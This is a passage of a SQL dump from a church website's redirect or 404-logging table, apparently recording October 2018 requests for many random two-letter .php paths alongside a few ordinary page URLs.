(9276, 'https://www.lifeoasisinternationalchurch.org/op.php', NULL, '', '', 2, 0, '2018-10-07 20:46:07', '0000-00-00 00:00:00', 301),
(9277, 'https://www.lifeoasisinternationalchurch.org/tj.php', NULL, '', '', 2, 0, '2018-10-07 20:53:20', '0000-00-00 00:00:00', 301),
(9278, 'https://www.lifeoasisinternationalchurch.org/jw.php', NULL, '', '', 2, 0, '2018-10-07 21:00:33', '0000-00-00 00:00:00', 301),
(9279, 'https://www.lifeoasisinternationalchurch.org/kx.php', NULL, '', '', 2, 0, '2018-10-07 21:07:41', '0000-00-00 00:00:00', 301),
(9280, 'https://www.lifeoasisinternationalchurch.org/jj.php', NULL, '', '', 2, 0, '2018-10-07 21:14:58', '0000-00-00 00:00:00', 301),
(9281, 'https://www.lifeoasisinternationalchurch.org/ab.php', NULL, '', '', 2, 0, '2018-10-07 21:22:03', '0000-00-00 00:00:00', 301),
(9282, 'https://www.lifeoasisinternationalchurch.org/jh.php', NULL, '', '', 2, 0, '2018-10-07 21:36:23', '0000-00-00 00:00:00', 301),
(9283, 'https://www.lifeoasisinternationalchurch.org/ou.php', NULL, '', '', 2, 0, '2018-10-07 21:43:31', '0000-00-00 00:00:00', 301),
(9284, 'https://www.lifeoasisinternationalchurch.org/xs.php', NULL, '', '', 2, 0, '2018-10-07 21:50:45', '0000-00-00 00:00:00', 301),
(9285, 'https://www.lifeoasisinternationalchurch.org/ul.php', NULL, '', '', 2, 0, '2018-10-07 21:57:52', '0000-00-00 00:00:00', 301),
(9286, 'https://www.lifeoasisinternationalchurch.org/np.php', NULL, '', '', 2, 0, '2018-10-07 22:05:02', '0000-00-00 00:00:00', 301),
(9287, 'https://www.lifeoasisinternationalchurch.org/na.php', NULL, '', '', 2, 0, '2018-10-07 22:12:10', '0000-00-00 00:00:00', 301),
(9288, 'https://www.lifeoasisinternationalchurch.org/yt.php', NULL, '', '', 2, 0, '2018-10-07 22:19:20', '0000-00-00 00:00:00', 301),
(9289, 'https://www.lifeoasisinternationalchurch.org/jq.php', NULL, '', '', 2, 0, '2018-10-07 22:26:32', '0000-00-00 00:00:00', 301),
(9290, 'https://www.lifeoasisinternationalchurch.org/zy.php', NULL, '', '', 2, 0, '2018-10-07 22:33:42', '0000-00-00 00:00:00', 301),
(9291, 'https://www.lifeoasisinternationalchurch.org/ds.php', NULL, '', '', 2, 0, '2018-10-07 22:40:53', '0000-00-00 00:00:00', 301),
(9292, 'https://www.lifeoasisinternationalchurch.org/kk.php', NULL, '', '', 2, 0, '2018-10-07 22:48:01', '0000-00-00 00:00:00', 301),
(9293, 'https://www.lifeoasisinternationalchurch.org/ii.php', NULL, '', '', 2, 0, '2018-10-07 23:02:16', '0000-00-00 00:00:00', 301),
(9294, 'https://www.lifeoasisinternationalchurch.org/qf.php', NULL, '', '', 2, 0, '2018-10-07 23:09:26', '0000-00-00 00:00:00', 301),
(9295, 'https://www.lifeoasisinternationalchurch.org/hz.php', NULL, '', '', 2, 0, '2018-10-07 23:16:32', '0000-00-00 00:00:00', 301),
(9296, 'https://www.lifeoasisinternationalchurch.org/jz.php', NULL, '', '', 2, 0, '2018-10-07 23:37:43', '0000-00-00 00:00:00', 301),
(9297, 'https://www.lifeoasisinternationalchurch.org/zq.php', NULL, '', '', 2, 0, '2018-10-07 23:44:44', '0000-00-00 00:00:00', 301),
(9298, 'https://www.lifeoasisinternationalchurch.org/be.php', NULL, '', '', 2, 0, '2018-10-07 23:51:47', '0000-00-00 00:00:00', 301),
(9299, 'https://www.lifeoasisinternationalchurch.org/pk.php', NULL, '', '', 2, 0, '2018-10-07 23:58:51', '0000-00-00 00:00:00', 301),
(9300, 'https://www.lifeoasisinternationalchurch.org/xa.php', NULL, '', '', 2, 0, '2018-10-08 00:06:02', '0000-00-00 00:00:00', 301),
(9301, 'https://www.lifeoasisinternationalchurch.org/ci.php', NULL, '', '', 2, 0, '2018-10-08 00:13:10', '0000-00-00 00:00:00', 301),
(9302, 'https://www.lifeoasisinternationalchurch.org/ti.php', NULL, '', '', 2, 0, '2018-10-08 00:20:16', '0000-00-00 00:00:00', 301),
(9303, 'https://www.lifeoasisinternationalchurch.org/sb.php', NULL, '', '', 2, 0, '2018-10-08 00:27:31', '0000-00-00 00:00:00', 301),
(9304, 'https://www.lifeoasisinternationalchurch.org/ug.php', NULL, '', '', 2, 0, '2018-10-08 00:42:04', '0000-00-00 00:00:00', 301),
(9305, 'https://www.lifeoasisinternationalchurch.org/ar.php', NULL, '', '', 2, 0, '2018-10-08 00:49:16', '0000-00-00 00:00:00', 301),
(9306, 'https://www.lifeoasisinternationalchurch.org/zu.php', NULL, '', '', 2, 0, '2018-10-08 00:56:16', '0000-00-00 00:00:00', 301),
(9307, 'https://www.lifeoasisinternationalchurch.org/or.php', NULL, '', '', 2, 0, '2018-10-08 01:03:30', '0000-00-00 00:00:00', 301),
(9308, 'https://www.lifeoasisinternationalchurch.org/gm.php', NULL, '', '', 2, 0, '2018-10-08 01:10:43', '0000-00-00 00:00:00', 301),
(9309, 'https://www.lifeoasisinternationalchurch.org/sh.php', NULL, '', '', 2, 0, '2018-10-08 01:17:53', '0000-00-00 00:00:00', 301),
(9310, 'https://www.lifeoasisinternationalchurch.org/en.php', NULL, '', '', 2, 0, '2018-10-08 01:25:05', '0000-00-00 00:00:00', 301),
(9311, 'https://www.lifeoasisinternationalchurch.org/lk.php', NULL, '', '', 2, 0, '2018-10-08 01:39:38', '0000-00-00 00:00:00', 301),
(9312, 'https://www.lifeoasisinternationalchurch.org/fx.php', NULL, '', '', 2, 0, '2018-10-08 01:46:50', '0000-00-00 00:00:00', 301),
(9313, 'https://www.lifeoasisinternationalchurch.org/pe.php', NULL, '', '', 2, 0, '2018-10-08 01:54:03', '0000-00-00 00:00:00', 301),
(9314, 'https://www.lifeoasisinternationalchurch.org/zm.php', NULL, '', '', 2, 0, '2018-10-08 02:01:17', '0000-00-00 00:00:00', 301),
(9315, 'https://www.lifeoasisinternationalchurch.org/pm.php', NULL, '', '', 2, 0, '2018-10-08 02:08:28', '0000-00-00 00:00:00', 301),
(9316, 'https://www.lifeoasisinternationalchurch.org/hn.php', NULL, '', '', 2, 0, '2018-10-08 02:15:39', '0000-00-00 00:00:00', 301),
(9317, 'https://www.lifeoasisinternationalchurch.org/jm.php', NULL, '', '', 2, 0, '2018-10-08 02:22:48', '0000-00-00 00:00:00', 301),
(9318, 'https://www.lifeoasisinternationalchurch.org/le.php', NULL, '', '', 2, 0, '2018-10-08 02:30:04', '0000-00-00 00:00:00', 301),
(9319, 'https://www.lifeoasisinternationalchurch.org/ec.php', NULL, '', '', 2, 0, '2018-10-08 02:44:16', '0000-00-00 00:00:00', 301),
(9320, 'https://www.lifeoasisinternationalchurch.org/eq.php', NULL, '', '', 2, 0, '2018-10-08 02:51:30', '0000-00-00 00:00:00', 301),
(9321, 'https://www.lifeoasisinternationalchurch.org/bp.php', NULL, '', '', 2, 0, '2018-10-08 02:58:39', '0000-00-00 00:00:00', 301),
(9322, 'https://www.lifeoasisinternationalchurch.org/fk.php', NULL, '', '', 2, 0, '2018-10-08 03:05:52', '0000-00-00 00:00:00', 301),
(9323, 'https://www.lifeoasisinternationalchurch.org/dx.php', NULL, '', '', 2, 0, '2018-10-08 03:13:07', '0000-00-00 00:00:00', 301),
(9324, 'https://www.lifeoasisinternationalchurch.org/km.php', NULL, '', '', 2, 0, '2018-10-08 03:20:14', '0000-00-00 00:00:00', 301),
(9325, 'https://www.lifeoasisinternationalchurch.org/rl.php', NULL, '', '', 2, 0, '2018-10-08 03:27:24', '0000-00-00 00:00:00', 301),
(9326, 'https://www.lifeoasisinternationalchurch.org/vy.php', NULL, '', '', 2, 0, '2018-10-08 03:34:33', '0000-00-00 00:00:00', 301),
(9327, 'https://www.lifeoasisinternationalchurch.org/lu.php', NULL, '', '', 2, 0, '2018-10-08 03:41:41', '0000-00-00 00:00:00', 301),
(9328, 'https://www.lifeoasisinternationalchurch.org/qx.php', NULL, '', '', 2, 0, '2018-10-08 03:48:47', '0000-00-00 00:00:00', 301),
(9329, 'https://www.lifeoasisinternationalchurch.org/gi.php', NULL, '', '', 2, 0, '2018-10-08 03:55:57', '0000-00-00 00:00:00', 301),
(9330, 'https://www.lifeoasisinternationalchurch.org/kb.php', NULL, '', '', 2, 0, '2018-10-08 04:03:11', '0000-00-00 00:00:00', 301),
(9331, 'https://www.lifeoasisinternationalchurch.org/ob.php', NULL, '', '', 2, 0, '2018-10-08 04:10:27', '0000-00-00 00:00:00', 301),
(9332, 'https://www.lifeoasisinternationalchurch.org/yf.php', NULL, '', '', 2, 0, '2018-10-08 04:17:38', '0000-00-00 00:00:00', 301),
(9333, 'https://www.lifeoasisinternationalchurch.org/gg.php', NULL, '', '', 2, 0, '2018-10-08 04:24:55', '0000-00-00 00:00:00', 301),
(9334, 'https://www.lifeoasisinternationalchurch.org/vt.php', NULL, '', '', 2, 0, '2018-10-08 04:32:20', '0000-00-00 00:00:00', 301),
(9335, 'https://www.lifeoasisinternationalchurch.org/ep.php', NULL, '', '', 2, 0, '2018-10-08 04:39:35', '0000-00-00 00:00:00', 301),
(9336, 'https://www.lifeoasisinternationalchurch.org/ko.php', NULL, '', '', 2, 0, '2018-10-08 04:53:47', '0000-00-00 00:00:00', 301),
(9337, 'https://www.lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/last+days', NULL, '', '', 1, 0, '2018-10-08 04:57:19', '0000-00-00 00:00:00', 301),
(9338, 'https://www.lifeoasisinternationalchurch.org/qu.php', NULL, '', '', 2, 0, '2018-10-08 05:00:59', '0000-00-00 00:00:00', 301),
(9339, 'https://www.lifeoasisinternationalchurch.org/sc.php', NULL, '', '', 2, 0, '2018-10-08 05:15:26', '0000-00-00 00:00:00', 301),
(9340, 'https://www.lifeoasisinternationalchurch.org/ap.php', NULL, '', '', 2, 0, '2018-10-08 05:22:35', '0000-00-00 00:00:00', 301),
(9341, 'https://www.lifeoasisinternationalchurch.org/zt.php', NULL, '', '', 2, 0, '2018-10-08 05:29:41', '0000-00-00 00:00:00', 301),
(9342, 'https://www.lifeoasisinternationalchurch.org/nj.php', NULL, '', '', 2, 0, '2018-10-08 05:36:50', '0000-00-00 00:00:00', 301),
(9343, 'https://www.lifeoasisinternationalchurch.org/ig.php', NULL, '', '', 2, 0, '2018-10-08 05:44:04', '0000-00-00 00:00:00', 301),
(9344, 'https://www.lifeoasisinternationalchurch.org/wz.php', NULL, '', '', 2, 0, '2018-10-08 05:51:12', '0000-00-00 00:00:00', 301),
(9345, 'https://www.lifeoasisinternationalchurch.org/dm.php', NULL, '', '', 2, 0, '2018-10-08 05:58:25', '0000-00-00 00:00:00', 301),
(9346, 'https://www.lifeoasisinternationalchurch.org/fs.php', NULL, '', '', 2, 0, '2018-10-08 06:05:42', '0000-00-00 00:00:00', 301),
(9347, 'https://www.lifeoasisinternationalchurch.org/uq.php', NULL, '', '', 2, 0, '2018-10-08 06:12:54', '0000-00-00 00:00:00', 301),
(9348, 'https://www.lifeoasisinternationalchurch.org/gd.php', NULL, '', '', 2, 0, '2018-10-08 06:20:13', '0000-00-00 00:00:00', 301),
(9349, 'https://www.lifeoasisinternationalchurch.org/kc.php', NULL, '', '', 2, 0, '2018-10-08 06:27:35', '0000-00-00 00:00:00', 301),
(9350, 'https://www.lifeoasisinternationalchurch.org/xx.php', NULL, '', '', 2, 0, '2018-10-08 06:34:56', '0000-00-00 00:00:00', 301),
(9351, 'https://www.lifeoasisinternationalchurch.org/rc.php', NULL, '', '', 2, 0, '2018-10-08 06:42:22', '0000-00-00 00:00:00', 301),
(9352, 'https://www.lifeoasisinternationalchurch.org/hs.php', NULL, '', '', 2, 0, '2018-10-08 06:57:07', '0000-00-00 00:00:00', 301),
(9353, 'https://www.lifeoasisinternationalchurch.org/ym.php', NULL, '', '', 2, 0, '2018-10-08 07:04:36', '0000-00-00 00:00:00', 301),
(9354, 'https://lifeoasisinternationalchurch.org/42108c3c80b1977c630/7729644240b8a5a22', NULL, '', '', 1, 0, '2018-10-08 07:07:41', '0000-00-00 00:00:00', 301),
(9355, 'https://www.lifeoasisinternationalchurch.org/fr.php', NULL, '', '', 2, 0, '2018-10-08 07:11:54', '0000-00-00 00:00:00', 301),
(9356, 'https://www.lifeoasisinternationalchurch.org/ot.php', NULL, '', '', 2, 0, '2018-10-08 07:19:07', '0000-00-00 00:00:00', 301),
(9357, 'https://www.lifeoasisinternationalchurch.org/bd.php', NULL, '', '', 2, 0, '2018-10-08 07:26:13', '0000-00-00 00:00:00', 301),
(9358, 'https://www.lifeoasisinternationalchurch.org/vf.php', NULL, '', '', 2, 0, '2018-10-08 07:33:24', '0000-00-00 00:00:00', 301),
(9359, 'https://www.lifeoasisinternationalchurch.org/eu.php', NULL, '', '', 2, 0, '2018-10-08 07:40:40', '0000-00-00 00:00:00', 301),
(9360, 'https://www.lifeoasisinternationalchurch.org/gy.php', NULL, '', '', 2, 0, '2018-10-08 07:47:55', '0000-00-00 00:00:00', 301),
(9361, 'https://www.lifeoasisinternationalchurch.org/yk.php', NULL, '', '', 2, 0, '2018-10-08 07:55:14', '0000-00-00 00:00:00', 301),
(9362, 'https://www.lifeoasisinternationalchurch.org/ov.php', NULL, '', '', 2, 0, '2018-10-08 08:02:30', '0000-00-00 00:00:00', 301),
(9363, 'https://www.lifeoasisinternationalchurch.org/jg.php', NULL, '', '', 2, 0, '2018-10-08 08:09:50', '0000-00-00 00:00:00', 301),
(9364, 'https://www.lifeoasisinternationalchurch.org/mm.php', NULL, '', '', 2, 0, '2018-10-08 08:17:06', '0000-00-00 00:00:00', 301),
(9365, 'https://www.lifeoasisinternationalchurch.org/iw.php', NULL, '', '', 2, 0, '2018-10-08 08:24:23', '0000-00-00 00:00:00', 301),
(9366, 'https://www.lifeoasisinternationalchurch.org/ys.php', NULL, '', '', 2, 0, '2018-10-08 08:31:41', '0000-00-00 00:00:00', 301),
(9367, 'https://www.lifeoasisinternationalchurch.org/gu.php', NULL, '', '', 2, 0, '2018-10-08 08:39:00', '0000-00-00 00:00:00', 301),
(9368, 'https://www.lifeoasisinternationalchurch.org/zs.php', NULL, '', '', 2, 0, '2018-10-08 08:53:24', '0000-00-00 00:00:00', 301),
(9369, 'https://www.lifeoasisinternationalchurch.org/uc.php', NULL, '', '', 2, 0, '2018-10-08 09:00:32', '0000-00-00 00:00:00', 301),
(9370, 'https://www.lifeoasisinternationalchurch.org/ur.php', NULL, '', '', 2, 0, '2018-10-08 09:07:47', '0000-00-00 00:00:00', 301),
(9371, 'https://www.lifeoasisinternationalchurch.org/cd.php', NULL, '', '', 2, 0, '2018-10-08 09:15:03', '0000-00-00 00:00:00', 301),
(9372, 'https://www.lifeoasisinternationalchurch.org/ol.php', NULL, '', '', 2, 0, '2018-10-08 09:29:25', '0000-00-00 00:00:00', 301),
(9373, 'https://www.lifeoasisinternationalchurch.org/ek.php', NULL, '', '', 2, 0, '2018-10-08 09:36:36', '0000-00-00 00:00:00', 301),
(9374, 'https://www.lifeoasisinternationalchurch.org/qe.php', NULL, '', '', 2, 0, '2018-10-08 09:43:47', '0000-00-00 00:00:00', 301),
(9375, 'https://www.lifeoasisinternationalchurch.org/xp.php', NULL, '', '', 2, 0, '2018-10-08 09:50:59', '0000-00-00 00:00:00', 301),
(9376, 'https://www.lifeoasisinternationalchurch.org/qd.php', NULL, '', '', 2, 0, '2018-10-08 09:58:09', '0000-00-00 00:00:00', 301),
(9377, 'https://www.lifeoasisinternationalchurch.org/bn.php', NULL, '', '', 2, 0, '2018-10-08 10:05:19', '0000-00-00 00:00:00', 301),
(9378, 'https://www.lifeoasisinternationalchurch.org/ql.php', NULL, '', '', 2, 0, '2018-10-08 10:12:24', '0000-00-00 00:00:00', 301),
(9379, 'https://www.lifeoasisinternationalchurch.org/wu.php', NULL, '', '', 2, 0, '2018-10-08 10:19:33', '0000-00-00 00:00:00', 301),
(9380, 'https://www.lifeoasisinternationalchurch.org/mk.php', NULL, '', '', 2, 0, '2018-10-08 10:26:49', '0000-00-00 00:00:00', 301),
(9381, 'https://www.lifeoasisinternationalchurch.org/ny.php', NULL, '', '', 2, 0, '2018-10-08 10:34:07', '0000-00-00 00:00:00', 301),
(9382, 'https://www.lifeoasisinternationalchurch.org/ck.php', NULL, '', '', 2, 0, '2018-10-08 10:41:22', '0000-00-00 00:00:00', 301),
(9383, 'https://www.lifeoasisinternationalchurch.org/qk.php', NULL, '', '', 2, 0, '2018-10-08 10:48:35', '0000-00-00 00:00:00', 301),
(9384, 'https://www.lifeoasisinternationalchurch.org/uu.php', NULL, '', '', 2, 0, '2018-10-08 10:55:47', '0000-00-00 00:00:00', 301),
(9385, 'https://www.lifeoasisinternationalchurch.org/wv.php', NULL, '', '', 2, 0, '2018-10-08 11:02:59', '0000-00-00 00:00:00', 301),
(9386, 'https://www.lifeoasisinternationalchurch.org/db.php', NULL, '', '', 2, 0, '2018-10-08 11:10:11', '0000-00-00 00:00:00', 301),
(9387, 'https://www.lifeoasisinternationalchurch.org/vm.php', NULL, '', '', 2, 0, '2018-10-08 11:17:21', '0000-00-00 00:00:00', 301),
(9388, 'https://www.lifeoasisinternationalchurch.org/gs.php', NULL, '', '', 2, 0, '2018-10-08 11:24:31', '0000-00-00 00:00:00', 301),
(9389, 'https://www.lifeoasisinternationalchurch.org/aq.php', NULL, '', '', 2, 0, '2018-10-08 11:31:43', '0000-00-00 00:00:00', 301),
(9390, 'https://www.lifeoasisinternationalchurch.org/qh.php', NULL, '', '', 2, 0, '2018-10-08 11:39:01', '0000-00-00 00:00:00', 301),
(9391, 'https://www.lifeoasisinternationalchurch.org/ks.php', NULL, '', '', 2, 0, '2018-10-08 11:46:14', '0000-00-00 00:00:00', 301),
(9392, 'https://www.lifeoasisinternationalchurch.org/ml.php', NULL, '', '', 2, 0, '2018-10-08 11:53:24', '0000-00-00 00:00:00', 301),
(9393, 'https://www.lifeoasisinternationalchurch.org/nn.php', NULL, '', '', 2, 0, '2018-10-08 12:00:35', '0000-00-00 00:00:00', 301),
(9394, 'https://www.lifeoasisinternationalchurch.org/mz.php', NULL, '', '', 2, 0, '2018-10-08 12:07:44', '0000-00-00 00:00:00', 301),
(9395, 'https://www.lifeoasisinternationalchurch.org/kg.php', NULL, '', '', 2, 0, '2018-10-08 12:15:06', '0000-00-00 00:00:00', 301),
(9396, 'https://www.lifeoasisinternationalchurch.org/ht.php', NULL, '', '', 2, 0, '2018-10-08 12:22:22', '0000-00-00 00:00:00', 301),
(9397, 'https://www.lifeoasisinternationalchurch.org/yq.php', NULL, '', '', 2, 0, '2018-10-08 12:36:54', '0000-00-00 00:00:00', 301),
(9398, 'https://www.lifeoasisinternationalchurch.org/mh.php', NULL, '', '', 2, 0, '2018-10-08 12:44:08', '0000-00-00 00:00:00', 301),
(9399, 'https://www.lifeoasisinternationalchurch.org/yh.php', NULL, '', '', 2, 0, '2018-10-08 12:51:19', '0000-00-00 00:00:00', 301),
(9400, 'https://www.lifeoasisinternationalchurch.org/rw.php', NULL, '', '', 2, 0, '2018-10-08 12:58:26', '0000-00-00 00:00:00', 301),
(9401, 'https://www.lifeoasisinternationalchurch.org/oq.php', NULL, '', '', 2, 0, '2018-10-08 13:05:47', '0000-00-00 00:00:00', 301),
(9402, 'https://www.lifeoasisinternationalchurch.org/vv.php', NULL, '', '', 2, 0, '2018-10-08 13:12:57', '0000-00-00 00:00:00', 301),
(9403, 'https://www.lifeoasisinternationalchurch.org/hp.php', NULL, '', '', 2, 0, '2018-10-08 13:27:32', '0000-00-00 00:00:00', 301),
(9404, 'https://www.lifeoasisinternationalchurch.org/resources/blog/itemlist/tag/correct+christian', NULL, '', '', 1, 0, '2018-10-08 13:33:36', '0000-00-00 00:00:00', 301),
(9405, 'https://www.lifeoasisinternationalchurch.org/sx.php', NULL, '', '', 2, 0, '2018-10-08 13:34:46', '0000-00-00 00:00:00', 301),
(9406, 'https://www.lifeoasisinternationalchurch.org/vu.php', NULL, '', '', 2, 0, '2018-10-08 13:49:23', '0000-00-00 00:00:00', 301),
(9407, 'https://www.lifeoasisinternationalchurch.org/ah.php', NULL, '', '', 2, 0, '2018-10-08 13:56:37', '0000-00-00 00:00:00', 301),
(9408, 'https://www.lifeoasisinternationalchurch.org/bi.php', NULL, '', '', 2, 0, '2018-10-08 14:04:03', '0000-00-00 00:00:00', 301),
(9409, 'https://www.lifeoasisinternationalchurch.org/zn.php', NULL, '', '', 2, 0, '2018-10-08 14:18:56', '0000-00-00 00:00:00', 301),
(9410, 'https://www.lifeoasisinternationalchurch.org/nf.php', NULL, '', '', 2, 0, '2018-10-08 14:26:09', '0000-00-00 00:00:00', 301),
(9411, 'https://www.lifeoasisinternationalchurch.org/fq.php', NULL, '', '', 2, 0, '2018-10-08 14:33:21', '0000-00-00 00:00:00', 301),
(9412, 'https://www.lifeoasisinternationalchurch.org/fi.php', NULL, '', '', 2, 0, '2018-10-08 14:40:34', '0000-00-00 00:00:00', 301),
(9413, 'https://www.lifeoasisinternationalchurch.org/xb.php', NULL, '', '', 2, 0, '2018-10-08 14:47:47', '0000-00-00 00:00:00', 301),
(9414, 'https://www.lifeoasisinternationalchurch.org/gv.php', NULL, '', '', 2, 0, '2018-10-08 14:54:59', '0000-00-00 00:00:00', 301),
(9415, 'https://www.lifeoasisinternationalchurch.org/fd.php', NULL, '', '', 2, 0, '2018-10-08 15:09:28', '0000-00-00 00:00:00', 301),
(9416, 'https://www.lifeoasisinternationalchurch.org/of.php', NULL, '', '', 2, 0, '2018-10-08 15:16:45', '0000-00-00 00:00:00', 301),
(9417, 'https://www.lifeoasisinternationalchurch.org/gx.php', NULL, '', '', 2, 0, '2018-10-08 15:23:55', '0000-00-00 00:00:00', 301),
(9418, 'https://www.lifeoasisinternationalchurch.org/ms.php', NULL, '', '', 2, 0, '2018-10-08 15:31:07', '0000-00-00 00:00:00', 301),
(9419, 'https://lifeoasisinternationalchurch.org/3937993b/05842c70a4a4644', NULL, '', '', 1, 0, '2018-10-08 15:32:04', '0000-00-00 00:00:00', 301),
(9420, 'https://www.lifeoasisinternationalchurch.org/yu.php', NULL, '', '', 2, 0, '2018-10-08 15:38:15', '0000-00-00 00:00:00', 301),
(9421, 'https://www.lifeoasisinternationalchurch.org/ct.php', NULL, '', '', 2, 0, '2018-10-08 15:45:37', '0000-00-00 00:00:00', 301),
(9422, 'https://www.lifeoasisinternationalchurch.org/xq.php', NULL, '', '', 2, 0, '2018-10-08 15:53:06', '0000-00-00 00:00:00', 301),
(9423, 'https://www.lifeoasisinternationalchurch.org/im.php', NULL, '', '', 2, 0, '2018-10-08 16:00:31', '0000-00-00 00:00:00', 301),
(9424, 'https://www.lifeoasisinternationalchurch.org/vk.php', NULL, '', '', 2, 0, '2018-10-08 16:15:22', '0000-00-00 00:00:00', 301),
(9425, 'https://www.lifeoasisinternationalchurch.org/og.php', NULL, '', '', 2, 0, '2018-10-08 16:22:43', '0000-00-00 00:00:00', 301),
(9426, 'https://www.lifeoasisinternationalchurch.org/bh.php', NULL, '', '', 2, 0, '2018-10-08 16:30:25', '0000-00-00 00:00:00', 301),
(9427, 'https://www.lifeoasisinternationalchurch.org//live-streaming', NULL, '', '', 1, 0, '2018-10-08 16:30:35', '0000-00-00 00:00:00', 301),
(9428, 'https://www.lifeoasisinternationalchurch.org/ej.php', NULL, '', '', 2, 0, '2018-10-08 16:37:57', '0000-00-00 00:00:00', 301),
(9429, 'https://www.lifeoasisinternationalchurch.org/sy.php', NULL, '', '', 2, 0, '2018-10-08 16:45:38', '0000-00-00 00:00:00', 301),
(9430, 'https://www.lifeoasisinternationalchurch.org/ax.php', NULL, '', '', 2, 0, '2018-10-08 17:00:47', '0000-00-00 00:00:00', 301),
(9431, 'https://www.lifeoasisinternationalchurch.org/sd.php', NULL, '', '', 2, 0, '2018-10-08 17:08:08', '0000-00-00 00:00:00', 301),
(9432, 'https://www.lifeoasisinternationalchurch.org/bx.php', NULL, '', '', 2, 0, '2018-10-08 17:15:22', '0000-00-00 00:00:00', 301),
(9433, 'https://www.lifeoasisinternationalchurch.org/pn.php', NULL, '', '', 2, 0, '2018-10-08 17:22:44', '0000-00-00 00:00:00', 301),
(9434, 'https://www.lifeoasisinternationalchurch.org/cu.php', NULL, '', '', 2, 0, '2018-10-08 17:30:09', '0000-00-00 00:00:00', 301),
(9435, 'https://www.lifeoasisinternationalchurch.org/oh.php', NULL, '', '', 2, 0, '2018-10-08 17:45:09', '0000-00-00 00:00:00', 301),
(9436, 'https://www.lifeoasisinternationalchurch.org/oc.php', NULL, '', '', 2, 0, '2018-10-08 17:52:35', '0000-00-00 00:00:00', 301),
(9437, 'https://lifeoasisinternationalchurch.org/smplz/', NULL, 'vivian-wise.com', '', 4, 0, '2018-10-08 17:52:59', '0000-00-00 00:00:00', 301),
(9438, 'https://www.lifeoasisinternationalchurch.org/mv.php', NULL, '', '', 2, 0, '2018-10-08 17:59:58', '0000-00-00 00:00:00', 301),
(9439, 'https://www.lifeoasisinternationalchurch.org/nk.php', NULL, '', '', 2, 0, '2018-10-08 18:07:27', '0000-00-00 00:00:00', 301),
(9440, 'https://www.lifeoasisinternationalchurch.org/ll.php', NULL, '', '', 2, 0, '2018-10-08 18:22:14', '0000-00-00 00:00:00', 301),
(9441, 'https://www.lifeoasisinternationalchurch.org/hu.php', NULL, '', '', 2, 0, '2018-10-08 18:29:19', '0000-00-00 00:00:00', 301),
(9442, 'https://www.lifeoasisinternationalchurch.org/vr.php', NULL, '', '', 2, 0, '2018-10-08 18:36:27', '0000-00-00 00:00:00', 301),
(9443, 'https://www.lifeoasisinternationalchurch.org/je.php', NULL, '', '', 2, 0, '2018-10-08 18:43:42', '0000-00-00 00:00:00', 301),
(9444, 'https://www.lifeoasisinternationalchurch.org/yy.php', NULL, '', '', 2, 0, '2018-10-08 18:50:51', '0000-00-00 00:00:00', 301),
(9445, 'https://www.lifeoasisinternationalchurch.org/mq.php', NULL, '', '', 2, 0, '2018-10-08 18:58:08', '0000-00-00 00:00:00', 301),
(9446, 'https://www.lifeoasisinternationalchurch.org/sk.php', NULL, '', '', 2, 0, '2018-10-08 19:05:23', '0000-00-00 00:00:00', 301),
(9447, 'https://www.lifeoasisinternationalchurch.org/xm.php', NULL, '', '', 2, 0, '2018-10-08 19:12:35', '0000-00-00 00:00:00', 301),
(9448, 'https://www.lifeoasisinternationalchurch.org/rt.php', NULL, '', '', 2, 0, '2018-10-08 19:19:43', '0000-00-00 00:00:00', 301),
(9449, 'https://www.lifeoasisinternationalchurch.org/ho.php', NULL, '', '', 2, 0, '2018-10-08 19:26:56', '0000-00-00 00:00:00', 301),
(9450, 'https://www.lifeoasisinternationalchurch.org/xn.php', NULL, '', '', 2, 0, '2018-10-08 19:34:20', '0000-00-00 00:00:00', 301),
(9451, 'https://www.lifeoasisinternationalchurch.org/tz.php', NULL, '', '', 2, 0, '2018-10-08 19:41:37', '0000-00-00 00:00:00', 301),
(9452, 'https://www.lifeoasisinternationalchurch.org/mw.php', NULL, '', '', 2, 0, '2018-10-08 19:48:58', '0000-00-00 00:00:00', 301),
(9453, 'https://www.lifeoasisinternationalchurch.org/wa.php', NULL, '', '', 2, 0, '2018-10-08 19:56:16', '0000-00-00 00:00:00', 301),
(9454, 'https://www.lifeoasisinternationalchurch.org/tk.php', NULL, '', '', 2, 0, '2018-10-08 20:03:27', '0000-00-00 00:00:00', 301),
(9455, 'https://www.lifeoasisinternationalchurch.org/sr.php', NULL, '', '', 2, 0, '2018-10-08 20:10:38', '0000-00-00 00:00:00', 301),
(9456, 'https://www.lifeoasisinternationalchurch.org/vz.php', NULL, '', '', 2, 0, '2018-10-08 20:17:45', '0000-00-00 00:00:00', 301),
(9457, 'https://www.lifeoasisinternationalchurch.org/ls.php', NULL, '', '', 2, 0, '2018-10-08 20:24:54', '0000-00-00 00:00:00', 301),
(9458, 'https://www.lifeoasisinternationalchurch.org/bs.php', NULL, '', '', 2, 0, '2018-10-08 20:32:05', '0000-00-00 00:00:00', 301),
(9459, 'https://www.lifeoasisinternationalchurch.org/sw.php', NULL, '', '', 2, 0, '2018-10-08 20:39:07', '0000-00-00 00:00:00', 301),
(9460, 'https://www.lifeoasisinternationalchurch.org/ni.php', NULL, '', '', 2, 0, '2018-10-08 20:53:19', '0000-00-00 00:00:00', 301),
(9461, 'https://www.lifeoasisinternationalchurch.org/rk.php', NULL, '', '', 2, 0, '2018-10-08 21:14:37', '0000-00-00 00:00:00', 301),
(9462, 'https://www.lifeoasisinternationalchurch.org/mu.php', NULL, '', '', 2, 0, '2018-10-08 21:21:46', '0000-00-00 00:00:00', 301),
(9463, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=lz-mrlnbopy', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 4, 0, '2018-10-08 21:26:51', '0000-00-00 00:00:00', 301),
(9464, 'https://www.lifeoasisinternationalchurch.org/yg.php', NULL, '', '', 2, 0, '2018-10-08 21:28:57', '0000-00-00 00:00:00', 301),
(9465, 'https://www.lifeoasisinternationalchurch.org/on.php', NULL, '', '', 2, 0, '2018-10-08 21:36:13', '0000-00-00 00:00:00', 301),
(9466, 'https://www.lifeoasisinternationalchurch.org/nu.php', NULL, '', '', 2, 0, '2018-10-08 21:43:19', '0000-00-00 00:00:00', 301),
(9467, 'https://www.lifeoasisinternationalchurch.org/eg.php', NULL, '', '', 2, 0, '2018-10-08 21:57:38', '0000-00-00 00:00:00', 301),
(9468, 'https://www.lifeoasisinternationalchurch.org/cx.php', NULL, '', '', 2, 0, '2018-10-08 22:04:43', '0000-00-00 00:00:00', 301),
